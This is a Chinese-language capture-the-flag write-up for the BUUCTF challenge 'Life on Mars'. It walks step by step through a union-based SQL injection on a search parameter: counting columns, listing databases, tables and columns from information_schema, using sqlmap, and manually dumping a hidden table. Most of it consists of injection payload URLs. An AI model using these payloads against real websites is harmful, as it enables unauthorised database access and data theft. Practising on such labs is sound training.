BUUCTF：[b01lers2020]LifeonMars

题目地址&＃xff1a;https://buuoj.cn/challenges#[b01lers2020]Life%20on%20Mars


一个关于火星生命的科普站&＃xff0c;目录扫描啥都没发现&＃xff0c;用burp抓两个包分析一下&＃xff0c;发现几个可疑传参

/query?search&＃61;如果地名输入正确&＃xff0c;发现返回如下

order by判断字段&＃xff0c;2字段时回显正确

union联合查询&＃xff1a;/query?search&＃61;amazonis_planitia union select 111,222
回显点如图所示&＃xff1a;

查库&＃xff1a;/query?search&＃61;amazonis_planitia union select version(),database()

查表&＃xff1a;/query?search&＃61;amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema&＃61;&＃39;aliens&＃39;

没发现什么可疑表&＃xff0c;再查查当前表&＃xff0c;当前使用表是&＃xff1a;utopia_basin

查utopia_basin表的字段&＃xff1a;/query?search&＃61;amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name&＃61;&＃39;utopia_basin&＃39;

好像还是没有发现什么可疑的内容…&＃xff0c;再查查字段内容看看&＃xff1a;/query?search&＃61;amazonis_planitia union select group_concat(name),group_concat(description) from aliens.utopia_basin

nmd…到这就迷了…然后接着去查了还有没有其他库&＃xff1a;/query?search&＃61;amazonis_planitia union select 1,group_concat(database()) from information_schema.schemata
然后就把我看懵了…3个一样的数据库&＃xff1f;

查查数据库个数&＃xff1a;/query?search&＃61;amazonis_planitia union select database(),count(database())

???只有一个数据库&＃xff1f;是不是有坑&＃xff1f;难道要拿下网站权限&＃xff0c;flag在服务器上&＃xff1f;

然后在尝试使用sqlmap拿取网站权限的时候&＃xff0c;nm竟然发现有别的库被查出来了…

发现有个alien_code的数据库&＃xff0c;里面有个code表


可是到了这里竟然--dump不出来…服了&＃xff0c;手注&＃xff1a;/query?search&＃61;amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code